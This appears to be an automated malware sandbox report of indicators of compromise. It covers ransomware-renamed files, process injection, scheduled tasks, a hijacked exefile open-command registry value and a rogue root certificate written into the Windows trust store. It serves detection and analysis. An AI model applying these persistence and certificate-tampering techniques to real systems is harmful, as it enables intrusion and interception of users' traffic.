3876	stub.exe
3876	stub.exe
3876	stub.exe
3876	stub.exe
3876	stub.exe
3876	stub.exe
3876	stub.exe
3876	stub.exe
3876	stub.exe
3876	stub.exe

Suspicious use of SetThreadContext 12 IoCs

Processes:

7.exeliveupdate.exeALEXXX~1.EXESWIZZY~1.EXEcertutil.exe

description	pid	Process	procid_target
PID 5024 set thread context of 2208	5024	7.exe	171
PID 5024 set thread context of 5000	5024	7.exe	177
PID 5340 set thread context of 3400	5340	liveupdate.exe	191
PID 2820 set thread context of 4044	2820	ALEXXX~1.EXE	212
PID 6916 set thread context of 5920	6916	SWIZZY~1.EXE	253
PID 2620 set thread context of 1976	2620	certutil.exe	267
PID 5024 set thread context of 2208	5024	7.exe	171
PID 5024 set thread context of 5000	5024	7.exe	177
PID 5340 set thread context of 3400	5340	liveupdate.exe	191
PID 2820 set thread context of 4044	2820	ALEXXX~1.EXE	212
PID 6916 set thread context of 5920	6916	SWIZZY~1.EXE	253
PID 2620 set thread context of 1976	2620	certutil.exe	267

Drops file in Program Files directory 64 IoCs

Processes:

wscript.exebot.exe

description	ioc	Process
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Paint_10.2104.17.0_neutral_split.scale-125_8wekyb3d8bbwe.Cyborg Builder Ransomware	wscript.exe
File opened for modification	C:\PROGRA~3\Adobe\Setup\{AC76B~1\setup.exe	bot.exe
File created	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.25\System.Runtime.Loader.dll.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_OEM_Perp-ul-phn.xrm-ms.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProR_OEM_Perp-ppd.xrm-ms.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libfluidsynth_plugin.dll.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\7-Zip\Lang\es.txt.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\O365BusinessR_Subscription-ul-oob.xrm-ms.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\VisioProVL_KMS_Client-ppd.xrm-ms.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\msvcp120.dll.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\COMPASS\COMPASS.INF.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\System.ComponentModel.DataAnnotations.dll.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\te.pak.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_Trial-ul-oob.xrm-ms.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MEDIA\WIND.WAV.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected] Builder Ransomware	wscript.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\System.Printing.dll.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.0\System.Linq.dll.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Getstarted_10.2.41172.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\TipsSmallTile.scale-200_contrast-black.png.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\Mso50win32client.dll.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\VBCN6.CHM.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\[email protected] Builder Ransomware	wscript.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019VL_KMS_Client_AE-ppd.xrm-ms.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Microsoft Office\root\Office16\api-ms-win-crt-math-l1-1-0.dll.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Microsoft Office\root\Office16\OneNote\SendToOneNoteNames.gpd.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CANYON\CANYON.INF.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\NETWORK\THMBNAIL.PNG.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libpostproc_plugin.dll.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\System.Configuration.ConfigurationManager.dll.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Java\jdk-1.8\bin\jstatd.exe.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\MSO99LRES.DLL.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\WindowsApps\Microsoft.BingNews_1.0.6.0_x64__8wekyb3d8bbwe\Assets\AppTiles\NewsAppList.targetsize-32_altform-unplated.png.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\7-Zip\Lang\mr.txt.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.0\System.Security.Cryptography.OpenSsl.dll.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Java\jre-1.8\legal\javafx\libxslt.md.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] Builder Ransomware	wscript.exe
File created	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\ANTQUABI.TTF.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\PAPYRUS.TTF.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\WindowsBase.dll.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\VideoLAN\VLC\locale\km.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\WindowsApps\Microsoft.BingNews_1.0.6.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\NewsWideTile.scale-200_contrast-white.png.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\i640.cab.cat.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements\LogoBeta.png.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-white_scale-100.png.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Resources\1033\msolui.rll.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Extensions\external_extensions.json.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\System.Web.Entity.dll.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-filesystem-l1-1-0.dll.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.pl-pl.dll.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.0\clretwrc.dll.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.25\cs\System.Windows.Forms.Design.resources.dll.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.25\ja\UIAutomationClientSideProviders.resources.dll.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Java\jdk-1.8\legal\jdk\jcup.md.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\7-Zip\Lang\mk.txt.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\vlc.mo.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_OEM_Perp-ul-phn.xrm-ms.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\fr\System.Windows.Input.Manipulations.resources.dll.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019R_PrepidBypass-ul-oob.xrm-ms.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Microsoft Office\root\Office16\ORGCHART.EXE.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Microsoft Office\root\Office16\FPA_f7\FA000000007.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-crt-math-l1-1-0.dll.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MSIPC\de.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Microsoft Office\root\Templates\1033\QuizShow.potx.Cyborg Builder Ransomware	wscript.exe

Drops file in Windows directory 64 IoCs

Processes:

[email protected]svchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.combot.exeWattyl.exesvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.com

description	ioc	Process
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\thunderbird	[email protected]
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\office	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\onenote	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\powerpoint	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\word	[email protected]
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\bitcoin	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\word	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\onenote	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\onenote	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\word	[email protected]
File opened for modification	C:\Windows\svchost.com	bot.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\onenote	[email protected]
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\word	[email protected]
File created	C:\Windows\RVHOST.exe	Wattyl.exe
File opened for modification	\??\c:\windows\	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\excel	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\excel	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\microsoft sql server	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\the bat!	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft sql server	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\onenote	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\thunderbird	[email protected]
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft sql server	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\excel	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\outlook	[email protected]
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\microsoft sql server	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\onenote	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\outlook	[email protected]
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\bitcoin	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\excel	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\the bat!	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\outlook	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\thunderbird	[email protected]
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\excel	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\powerpoint	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\onenote	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\outlook	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\thunderbird	[email protected]
File opened for modification	C:\Windows\directx.sys	svchost.com

Launches sc.exe 9 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	Process
5804	sc.exe
4768	sc.exe
4928	sc.exe
6436	sc.exe
4956	sc.exe
1532	sc.exe
5280	sc.exe
6360	sc.exe
7104	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 22 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	Process	procid_target
4712	5832	WerFault.exe	147
3060	4788	WerFault.exe	159
5740	6084	WerFault.exe	160
4508	6084	WerFault.exe	160
5668	5832	WerFault.exe	147
1932	4788	WerFault.exe	159
2636	6596	WerFault.exe	234
6464	6212	WerFault.exe	269
3488	6972	WerFault.exe	303
5428	1432	WerFault.exe	335
4440	1960	WerFault.exe	384
4712	5832	WerFault.exe	147
3060	4788	WerFault.exe	159
5740	6084	WerFault.exe	160
4508	6084	WerFault.exe	160
5668	5832	WerFault.exe	147
1932	4788	WerFault.exe	159
2636	6596	WerFault.exe	234
6464	6212	WerFault.exe	269
3488	6972	WerFault.exe	303
5428	1432	WerFault.exe	335
4440	1960	WerFault.exe	384

Creates scheduled task(s) 1 TTPs 7 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	Process
5964	schtasks.exe
5280	schtasks.exe
5500	schtasks.exe
5684	schtasks.exe
1628	schtasks.exe
5656	schtasks.exe
5864	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 1 IoCs

evasion

Processes:

taskkill.exe

pid	Process
2232	taskkill.exe

Modifies registry class 11 IoCs

Processes:

bot.exeTEMPSP~1.EXEidentity_helper.exeTEMPEX~1.EXE5.exe[email protected]RegAsm.exeTJEAJW~1.EXEbot.exeRIP_YOUR_PC_LOL.exe4363463463464363463463463.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000_Classes\Local Settings	bot.exe
Key created	\REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000_Classes\Local Settings	TEMPSP~1.EXE
Key created	\REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000_Classes\Local Settings	identity_helper.exe
Key created	\REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000_Classes\Local Settings	TEMPEX~1.EXE
Key created	\REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000_Classes\Local Settings	5.exe
Key created	\REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000_Classes\Local Settings	[email protected]
Key created	\REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000_Classes\Local Settings	RegAsm.exe
Key created	\REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000_Classes\Local Settings	TJEAJW~1.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	bot.exe
Key created	\REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000_Classes\Local Settings	RIP_YOUR_PC_LOL.exe
Key created	\REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000_Classes\Local Settings	4363463463464363463463463.exe

Modifies system certificate store 2 TTPs 7 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

propro.exe4363463463464363463463463.exewr.exe

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	propro.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	4363463463464363463463463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0f000000010000002000000020d814fd5fc477ce74425e441d8f5b48d38db6f1dd119441bc35777689bd094c030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b0640200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000020000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	4363463463464363463463463.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	wr.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	wr.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d